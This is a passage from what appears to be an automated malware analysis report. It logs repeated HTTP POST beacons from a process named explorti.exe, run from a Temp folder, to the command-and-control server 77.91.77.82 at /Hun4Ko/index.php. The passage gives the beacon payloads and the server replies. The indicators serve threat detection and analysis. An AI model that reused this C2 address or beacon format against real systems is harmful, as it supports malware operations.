                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:18.420727015 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:18 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                17192.168.2.44975977.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:18.535423040 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:19.232672930 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:19.233426094 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:19.450366020 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:19 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                18192.168.2.44976077.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:19.568286896 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:20.291481018 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:20.292093992 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:20.520787001 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:20 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                19192.168.2.44976177.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:20.628113031 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:21.320779085 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:21 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:21.321603060 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:21.538017988 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:21 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                20192.168.2.44976277.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:21.659364939 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:22.360511065 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:22.361375093 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:22.582298040 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:22 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                21192.168.2.44976377.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:22.691457987 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:23.402371883 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:23.403130054 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:23.626060963 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:23 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                22192.168.2.44976477.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:23.737446070 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:24.432148933 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:24.432959080 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:24.647975922 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:24 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                23192.168.2.44976577.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:24.768671989 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:25.500371933 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:25.501020908 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:25.730277061 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:25 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                24192.168.2.44976677.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:25.858331919 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:26.583842993 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:26.586811066 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:26.811007023 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:26 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                25192.168.2.44976777.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:26.925381899 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:27.616909027 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:27.618844986 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:27.835195065 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:27 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                26192.168.2.44976877.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:27.957830906 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:28.666785955 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:28.667560101 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:28.885418892 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:28 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                27192.168.2.44976977.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
                                                                TimestampBytes transferredDirectionData
                                                                Jul 5, 2024 04:37:29.003551960 CEST151OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 4
                                                                Cache-Control: no-cache
                                                                Data Raw: 73 74 3d 73
                                                                Data Ascii: st=s
                                                                Jul 5, 2024 04:37:29.717938900 CEST219INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Refresh: 0; url = Login.php
                                                                Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 1 0
                                                                Jul 5, 2024 04:37:29.718662024 CEST303OUTPOST /Hun4Ko/index.php HTTP/1.1
                                                                Content-Type: application/x-www-form-urlencoded
                                                                Host: 77.91.77.82
                                                                Content-Length: 154
                                                                Cache-Control: no-cache
                                                                Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 42 37 33 42 34 35 30 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A7FB02B73B45082D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                Jul 5, 2024 04:37:29.944940090 CEST196INHTTP/1.1 200 OK
                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                Date: Fri, 05 Jul 2024 02:37:29 GMT
                                                                Content-Type: text/html; charset=UTF-8
                                                                Transfer-Encoding: chunked
                                                                Connection: keep-alive
                                                                Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                Data Ascii: 7 <c><d>0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                28192.168.2.44977077.91.77.82807548C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe
